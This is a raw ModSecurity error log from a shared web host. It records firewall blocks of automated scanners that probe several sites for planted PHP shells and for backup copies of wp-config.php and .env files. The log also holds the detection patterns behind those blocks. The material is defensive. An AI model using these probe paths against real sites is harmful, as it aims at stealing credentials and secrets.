[Tue May 26 17:47:37.840827 2026] [security2:error] [pid 924957:tid 925197] [client 208.84.100.114:52006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv0AAAAG4"]
[Tue May 26 17:47:37.869271 2026] [security2:error] [pid 924957:tid 925093] [client 208.84.100.114:52028] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdvzwAAAAY"]
[Tue May 26 17:47:37.880035 2026] [security2:error] [pid 924957:tid 925161] [client 4.228.83.111:45143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWPYeYv2AvxeXULfJdwrgAAAEo"]
[Tue May 26 17:47:37.880236 2026] [security2:error] [pid 924957:tid 925161] [client 4.228.83.111:45143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWPYeYv2AvxeXULfJdwrgAAAEo"]
[Tue May 26 17:47:37.909320 2026] [security2:error] [pid 924957:tid 925200] [client 208.84.100.114:52072] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv0gAAAHE"]
[Tue May 26 17:47:38.808552 2026] [security2:error] [pid 924957:tid 925141] [client 208.84.100.114:52164] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv2AAAADY"]
[Tue May 26 17:47:38.819985 2026] [security2:error] [pid 924957:tid 925089] [client 208.84.100.114:51992] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdvzgAAAAI"]
[Tue May 26 17:47:38.825546 2026] [security2:error] [pid 924957:tid 925087] [client 208.84.100.114:52154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv2wAAAAA"]
[Tue May 26 17:47:38.902673 2026] [security2:error] [pid 924957:tid 925211] [client 208.84.100.114:51940] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv5gAAAHw"]
[Tue May 26 17:47:38.919200 2026] [security2:error] [pid 924957:tid 925184] [client 208.84.100.114:52066] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv0wAAAGE"]
[Tue May 26 17:47:38.921657 2026] [security2:error] [pid 924957:tid 925135] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv8gAAADA"]
[Tue May 26 17:47:38.958371 2026] [security2:error] [pid 924957:tid 925116] [client 208.84.100.114:51864] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv4AAAAB0"]
[Tue May 26 17:47:38.984560 2026] [security2:error] [pid 924957:tid 925133] [client 208.84.100.114:51960] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv6wAAAC4"]
[Tue May 26 17:47:38.989747 2026] [security2:error] [pid 924957:tid 925121] [client 208.84.100.114:52058] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv1AAAACI"]
[Tue May 26 17:47:39.023759 2026] [security2:error] [pid 924957:tid 925117] [client 208.84.100.114:52022] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv0QAAAB4"]
[Tue May 26 17:47:39.036515 2026] [security2:error] [pid 924957:tid 925097] [client 208.84.100.114:51948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv5QAAAAo"]
[Tue May 26 17:47:39.089521 2026] [security2:error] [pid 924957:tid 925129] [client 208.84.100.114:52078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv3AAAACo"]
[Tue May 26 17:47:39.090900 2026] [security2:error] [pid 924957:tid 925158] [client 208.84.100.114:51978] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdvzAAAAEc"]
[Tue May 26 17:47:39.103450 2026] [security2:error] [pid 924957:tid 925180] [client 208.84.100.114:52132] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv1gAAAF0"]
[Tue May 26 17:47:39.103825 2026] [security2:error] [pid 924957:tid 925195] [client 208.84.100.114:52118] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv1wAAAGw"]
[Tue May 26 17:47:39.336326 2026] [security2:error] [pid 924957:tid 925100] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPYuYv2AvxeXULfJdw0AAAAA0"]
[Tue May 26 17:47:39.773263 2026] [security2:error] [pid 924957:tid 925185] [client 208.84.100.114:52102] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv3gAAAGI"]
[Tue May 26 17:47:39.842376 2026] [security2:error] [pid 924957:tid 925119] [client 212.193.3.200:59506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.3.193.212.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-includes/core.php"] [unique_id "ahWPY-Yv2AvxeXULfJdw3wAAACA"]
[Tue May 26 17:47:39.891130 2026] [security2:error] [pid 924957:tid 925118] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv8wAAAB8"]
[Tue May 26 17:47:39.935322 2026] [security2:error] [pid 924957:tid 925089] [client 4.228.83.111:38029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahWPY-Yv2AvxeXULfJdw5gAAAAI"]
[Tue May 26 17:47:39.935436 2026] [security2:error] [pid 924957:tid 925089] [client 4.228.83.111:38029] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahWPY-Yv2AvxeXULfJdw5gAAAAI"]
[Tue May 26 17:47:40.029679 2026] [security2:error] [pid 924957:tid 925166] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPXOYv2AvxeXULfJdv9AAAAE8"]
[Tue May 26 17:47:41.067812 2026] [security2:error] [pid 924957:tid 925189] [client 20.151.111.128:2371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWPZeYv2AvxeXULfJdxAQAAAGY"], referer: www.google.com
[Tue May 26 17:47:41.072292 2026] [security2:error] [pid 924957:tid 925100] [client 20.151.111.128:2413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahWPZeYv2AvxeXULfJdxAwAAAA0"], referer: www.google.com
[Tue May 26 17:47:41.606952 2026] [security2:error] [pid 924957:tid 925186] [client 4.228.83.111:38066] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPZeYv2AvxeXULfJdxFQAAAGM"]
[Tue May 26 17:47:41.642084 2026] [security2:error] [pid 924957:tid 925113] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPZeYv2AvxeXULfJdxDQAAABo"]
[Tue May 26 17:47:41.791131 2026] [security2:error] [pid 924957:tid 925166] [client 4.228.83.111:38066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahWPZeYv2AvxeXULfJdxHgAAAE8"]
[Tue May 26 17:47:41.791227 2026] [security2:error] [pid 924957:tid 925166] [client 4.228.83.111:38066] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/admin/controller/extension/extension/ultra.php"] [unique_id "ahWPZeYv2AvxeXULfJdxHgAAAE8"]
[Tue May 26 17:47:43.277542 2026] [security2:error] [pid 924957:tid 925088] [client 4.228.83.111:38021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/about.php"] [unique_id "ahWPZ-Yv2AvxeXULfJdxQwAAAAE"]
[Tue May 26 17:47:43.277655 2026] [security2:error] [pid 924957:tid 925088] [client 4.228.83.111:38021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/about.php"] [unique_id "ahWPZ-Yv2AvxeXULfJdxQwAAAAE"]
[Tue May 26 17:47:44.397795 2026] [security2:error] [pid 924957:tid 925196] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPZ-Yv2AvxeXULfJdxWQAAAG0"]
[Tue May 26 17:47:44.791214 2026] [security2:error] [pid 924957:tid 925145] [client 4.228.83.111:45150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/go.php"] [unique_id "ahWPaOYv2AvxeXULfJdxcgAAADo"]
[Tue May 26 17:47:44.791308 2026] [security2:error] [pid 924957:tid 925145] [client 4.228.83.111:45150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/go.php"] [unique_id "ahWPaOYv2AvxeXULfJdxcgAAADo"]
[Tue May 26 17:47:45.621321 2026] [security2:error] [pid 924957:tid 925127] [client 20.151.111.128:9296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWPaeYv2AvxeXULfJdxjgAAACg"]
[Tue May 26 17:47:45.942548 2026] [security2:error] [pid 924957:tid 925118] [client 20.151.111.128:2154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/gbhjqomb.php"] [unique_id "ahWPaeYv2AvxeXULfJdxmAAAAB8"], referer: www.google.com
[Tue May 26 17:47:46.376792 2026] [security2:error] [pid 924957:tid 925119] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPaeYv2AvxeXULfJdxmwAAACA"]
[Tue May 26 17:47:46.448733 2026] [security2:error] [pid 924957:tid 925098] [client 104.207.63.107:64697] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/"] [unique_id "ahWPauYv2AvxeXULfJdxqAAAAAs"]
[Tue May 26 17:47:47.310281 2026] [security2:error] [pid 924957:tid 925094] [client 4.228.83.111:45157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/vv.php"] [unique_id "ahWPa-Yv2AvxeXULfJdxwAAAAAc"]
[Tue May 26 17:47:47.310399 2026] [security2:error] [pid 924957:tid 925094] [client 4.228.83.111:45157] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/vv.php"] [unique_id "ahWPa-Yv2AvxeXULfJdxwAAAAAc"]
[Tue May 26 17:47:47.354687 2026] [security2:error] [pid 924957:tid 925195] [client 208.84.100.114:42624] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPauYv2AvxeXULfJdxtAAAAGw"]
[Tue May 26 17:47:47.590500 2026] [security2:error] [pid 924957:tid 925191] [client 104.207.42.158:11355] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-login.php"] [unique_id "ahWPa-Yv2AvxeXULfJdxvwAAAGg"]
[Tue May 26 17:47:48.141543 2026] [security2:error] [pid 924957:tid 925171] [client 208.84.100.114:42662] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "shardagalaxy.com"] [uri "/wp-config.php.old"] [unique_id "ahWPbOYv2AvxeXULfJdx2gAAAFQ"]
[Tue May 26 17:47:48.141563 2026] [security2:error] [pid 924957:tid 925137] [client 208.84.100.114:42678] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "shardagalaxy.com"] [uri "/wp-config.php~"] [unique_id "ahWPbOYv2AvxeXULfJdx2wAAADI"]
[Tue May 26 17:47:48.141697 2026] [security2:error] [pid 924957:tid 925163] [client 208.84.100.114:42650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "shardagalaxy.com"] [uri "/wp-config.php.bak"] [unique_id "ahWPbOYv2AvxeXULfJdx3AAAAEw"]
[Tue May 26 17:47:48.146262 2026] [security2:error] [pid 924957:tid 925173] [client 208.84.100.114:42692] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "shardagalaxy.com"] [uri "/wp-config.php.save"] [unique_id "ahWPbOYv2AvxeXULfJdx3gAAAFY"]
[Tue May 26 17:47:48.203238 2026] [security2:error] [pid 924957:tid 925129] [client 208.84.100.114:42638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.100.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/wp-config.php"] [unique_id "ahWPbOYv2AvxeXULfJdx2QAAACo"]
[Tue May 26 17:47:48.205083 2026] [security2:error] [pid 924957:tid 925095] [client 208.84.100.114:42708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.100.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/.wp-config.php.swp"] [unique_id "ahWPbOYv2AvxeXULfJdx3QAAAAg"]
[Tue May 26 17:47:48.855085 2026] [security2:error] [pid 924957:tid 925192] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPbOYv2AvxeXULfJdx6gAAAGk"]
[Tue May 26 17:47:49.075548 2026] [security2:error] [pid 924957:tid 925160] [client 4.228.83.111:42909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ahWPbeYv2AvxeXULfJdx_QAAAEk"]
[Tue May 26 17:47:49.075645 2026] [security2:error] [pid 924957:tid 925160] [client 4.228.83.111:42909] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ahWPbeYv2AvxeXULfJdx_QAAAEk"]
[Tue May 26 17:47:50.270392 2026] [security2:error] [pid 924957:tid 925171] [client 14.191.11.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPbeYv2AvxeXULfJdyFwAAAFQ"]
[Tue May 26 17:47:50.434493 2026] [security2:error] [pid 924957:tid 925110] [client 20.151.111.128:2624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWPbuYv2AvxeXULfJdyJQAAABc"]
[Tue May 26 17:47:50.594572 2026] [security2:error] [pid 924957:tid 925132] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPbuYv2AvxeXULfJdyIAAAAC0"]
[Tue May 26 17:47:50.623071 2026] [security2:error] [pid 924957:tid 925123] [client 4.228.83.111:45171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/f35.php"] [unique_id "ahWPbuYv2AvxeXULfJdyKQAAACQ"]
[Tue May 26 17:47:50.623192 2026] [security2:error] [pid 924957:tid 925123] [client 4.228.83.111:45171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/f35.php"] [unique_id "ahWPbuYv2AvxeXULfJdyKQAAACQ"]
[Tue May 26 17:47:51.477392 2026] [security2:error] [pid 924957:tid 925179] [client 208.84.100.114:25416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.copy"] [unique_id "ahWPb-Yv2AvxeXULfJdyRgAAAFw"]
[Tue May 26 17:47:51.561738 2026] [security2:error] [pid 924957:tid 925089] [client 208.84.100.114:25556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local~"] [unique_id "ahWPb-Yv2AvxeXULfJdySgAAAAI"]
[Tue May 26 17:47:51.561747 2026] [security2:error] [pid 924957:tid 925122] [client 208.84.100.114:25620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.swp"] [unique_id "ahWPb-Yv2AvxeXULfJdyTwAAACM"]
[Tue May 26 17:47:51.561887 2026] [security2:error] [pid 924957:tid 925128] [client 208.84.100.114:25568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.orig"] [unique_id "ahWPb-Yv2AvxeXULfJdyTAAAACk"]
[Tue May 26 17:47:51.561980 2026] [security2:error] [pid 924957:tid 925125] [client 208.84.100.114:25598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.backup"] [unique_id "ahWPb-Yv2AvxeXULfJdyUQAAACY"]
